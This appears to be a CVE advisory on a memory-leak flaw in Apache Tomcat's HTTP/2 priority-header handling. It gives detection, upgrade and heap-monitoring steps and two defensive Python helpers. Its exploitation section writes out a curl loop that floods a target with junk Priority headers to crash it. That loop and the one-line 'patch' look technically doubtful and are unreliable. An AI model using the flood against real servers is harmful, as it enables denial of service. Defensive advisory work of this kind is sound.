How CVE-2025-31650 Works
Apache Tomcat fails to properly validate and clean up malformed HTTP/2 priority headers. When an attacker sends repeated invalid headers, Tomcat does not release the memory allocated for them, causing a memory leak. Over time this exhausts the available heap, triggering an `OutOfMemoryError` and crashing the server. The vulnerability affects Tomcat 9.0.76–9.0.102, 10.1.10–10.1.39, and 11.0.0-M2–11.0.5.
DailyCVE Form
Platform: Apache Tomcat
Version: 9.0.76–11.0.5
Vulnerability: Memory leak
Severity: High
Date: 05/05/2025
What Undercode Say:
Exploitation
1. Craft invalid HTTP/2 priority headers:

```http
GET / HTTP/2
Priority: invalid=1
```
2. Flood target server:

```shell
for i in {1..1000}; do curl -H "Priority: junk$i" http://target/; done
```
Detection
Check Tomcat logs for `OutOfMemoryError`:

```shell
grep -i "OutOfMemoryError" /var/log/tomcat/catalina.out
```
Mitigation
1. Upgrade Tomcat:

```shell
wget https://dlcdn.apache.org/tomcat/tomcat-11/v11.0.6/bin/apache-tomcat-11.0.6.tar.gz
```
2. Apply memory limits in `setenv.sh`:

```shell
export JAVA_OPTS="-Xmx512m -Xms128m"
```
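Before scheduling upgrades it helps to know which hosts in an inventory actually run an affected build. The following is an added example (not from the advisory or the Tomcat project) that encodes the three affected ranges stated above and compares version strings against them; the inventory dictionary and the `hosts_needing_upgrade` helper are assumptions for illustration. Milestone builds such as `11.0.0-M2` are handled explicitly, since they sort before the final release of the same number.

```python
import re
from typing import Dict, List, Tuple

# Affected ranges as stated in the advisory text above (inclusive on both ends).
AFFECTED_RANGES = [
    ("9.0.76", "9.0.102"),
    ("10.1.10", "10.1.39"),
    ("11.0.0-M2", "11.0.5"),
]

# major.minor.patch with an optional Tomcat milestone suffix, e.g. 11.0.0-M2
_VERSION_RE = re.compile(r"^(\d+)\.(\d+)\.(\d+)(?:-M(\d+))?$")


def parse_version(version: str) -> Tuple[int, int, int, int, int]:
    """Convert a Tomcat version string into a comparable tuple.

    The fourth element is an 'is_final' flag (0 for milestones, 1 for releases)
    so that 11.0.0-M2 < 11.0.0-M3 < 11.0.0 < 11.0.1 under plain tuple ordering.
    """
    match = _VERSION_RE.match(version.strip())
    if not match:
        raise ValueError(f"unrecognised Tomcat version: {version!r}")
    major, minor, patch, milestone = match.groups()
    is_final = 0 if milestone else 1
    return (int(major), int(minor), int(patch), is_final, int(milestone or 0))


def is_affected(version: str) -> bool:
    """True if the version falls inside one of the advisory's affected ranges."""
    parsed = parse_version(version)
    return any(
        parse_version(low) <= parsed <= parse_version(high)
        for low, high in AFFECTED_RANGES
    )


def hosts_needing_upgrade(inventory: Dict[str, str]) -> List[str]:
    """Given hostname -> Tomcat version, return the hosts still on an affected build.

    The inventory format is an assumption for this example; hostnames are sorted
    so the output is stable for ticketing or reporting.
    """
    return sorted(host for host, version in inventory.items() if is_affected(version))


if __name__ == "__main__":
    # Constructed sample inventory, not real hosts.
    sample_inventory = {
        "app-01": "9.0.80",
        "app-02": "10.1.40",
        "app-03": "11.0.0-M2",
        "app-04": "11.0.6",
    }
    for host in hosts_needing_upgrade(sample_inventory):
        print(f"{host}: Tomcat {sample_inventory[host]} is affected, upgrade required")
```

The comparison is purely lexical on the version tuple, so it does not account for backported fixes in vendor-packaged builds; for distribution packages, check the vendor's own advisory rather than relying on the upstream version number alone.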
Monitoring
Track heap usage via JMX:

```shell
jstat -gc <tomcat_pid> 1000
```
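A single `jstat` snapshot says little about a leak; what matters is whether old-generation usage keeps climbing even though full collections are running. The following is an added example (not part of the advisory) that parses `jstat -gc` output by column name and flags that pattern. The two sample outputs are constructed for this example; the column names (`S0C`, `S0U`, `EC`, `EU`, `OC`, `OU`, `FGC`, ...) follow the real `jstat -gc` header, with sizes in KB.

```python
from typing import Dict, List, Tuple

# Constructed jstat -gc output: old-gen usage (OU) rises on every sample even
# though full GCs (FGC) keep running, which is the signature of a leak.
LEAKING_JSTAT_OUTPUT = """\
 S0C    S1C    S0U    S1U      EC       EU        OC         OU       MC     MU    CCSC   CCSU   YGC     YGCT    FGC    FGCT     GCT
8192.0 8192.0  0.0   1024.0  65536.0  30000.0  393216.0   100000.0  51200.0 48000.0 6144.0 5600.0   120    0.900    2     0.400    1.300
8192.0 8192.0  0.0   1100.0  65536.0  41000.0  393216.0   180000.0  51200.0 48100.0 6144.0 5610.0   180    1.300    4     0.900    2.200
8192.0 8192.0 1024.0  0.0    65536.0  12000.0  393216.0   260000.0  51200.0 48200.0 6144.0 5620.0   240    1.800    6     1.500    3.300
8192.0 8192.0  0.0   1050.0  65536.0  52000.0  393216.0   350000.0  51200.0 48300.0 6144.0 5630.0   300    2.200    8     2.100    4.300
"""

# Constructed healthy output: full GCs reclaim old-gen memory, so OU fluctuates.
HEALTHY_JSTAT_OUTPUT = """\
 S0C    S1C    S0U    S1U      EC       EU        OC         OU       MC     MU    CCSC   CCSU   YGC     YGCT    FGC    FGCT     GCT
8192.0 8192.0  0.0   1024.0  65536.0  30000.0  393216.0   100000.0  51200.0 48000.0 6144.0 5600.0   120    0.900    2     0.400    1.300
8192.0 8192.0  0.0   1100.0  65536.0  41000.0  393216.0   180000.0  51200.0 48100.0 6144.0 5610.0   180    1.300    4     0.900    2.200
8192.0 8192.0 1024.0  0.0    65536.0  12000.0  393216.0    90000.0  51200.0 48200.0 6144.0 5620.0   240    1.800    6     1.500    3.300
8192.0 8192.0  0.0   1050.0  65536.0  52000.0  393216.0   150000.0  51200.0 48300.0 6144.0 5630.0   300    2.200    8     2.100    4.300
"""


def parse_jstat_gc(text: str) -> List[Dict[str, float]]:
    """Parse jstat -gc text into one dict per sample row, keyed by column name."""
    lines = [line for line in text.splitlines() if line.strip()]
    if not lines:
        return []
    header = lines[0].split()
    samples = []
    for line in lines[1:]:
        fields = line.split()
        if len(fields) != len(header):
            continue  # skip any repeated header or truncated row
        samples.append({name: float(value) for name, value in zip(header, fields)})
    return samples


def heap_usage(sample: Dict[str, float]) -> Tuple[float, float]:
    """Return (used_kb, capacity_kb) for the Java heap: survivors + eden + old gen."""
    used = sample["S0U"] + sample["S1U"] + sample["EU"] + sample["OU"]
    capacity = sample["S0C"] + sample["S1C"] + sample["EC"] + sample["OC"]
    return used, capacity


def leak_suspected(samples: List[Dict[str, float]], min_samples: int = 3) -> bool:
    """Flag a likely leak: old-gen usage strictly rising across every sample
    while at least one full GC ran, meaning collections are not reclaiming it."""
    if len(samples) < min_samples:
        return False
    old_used = [s["OU"] for s in samples]
    rising = all(later > earlier for earlier, later in zip(old_used, old_used[1:]))
    full_gc_ran = samples[-1]["FGC"] > samples[0]["FGC"]
    return rising and full_gc_ran


if __name__ == "__main__":
    for label, text in (("leaking", LEAKING_JSTAT_OUTPUT), ("healthy", HEALTHY_JSTAT_OUTPUT)):
        rows = parse_jstat_gc(text)
        used, capacity = heap_usage(rows[-1])
        print(f"{label}: heap {used / capacity:.0%} used, leak suspected = {leak_suspected(rows)}")
```

In practice feed this the output of `jstat -gc <tomcat_pid> <interval_ms>` captured over several minutes; a short window can show a rising old gen simply because no full GC has happened yet, which is why the check also requires `FGC` to have advanced.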
Patch Analysis
The fix enforces strict header validation:

```java
if (!isValidPriority(header)) { throw new IllegalArgumentException(); }
```
References
Sources:
Reported By: nvd.nist.gov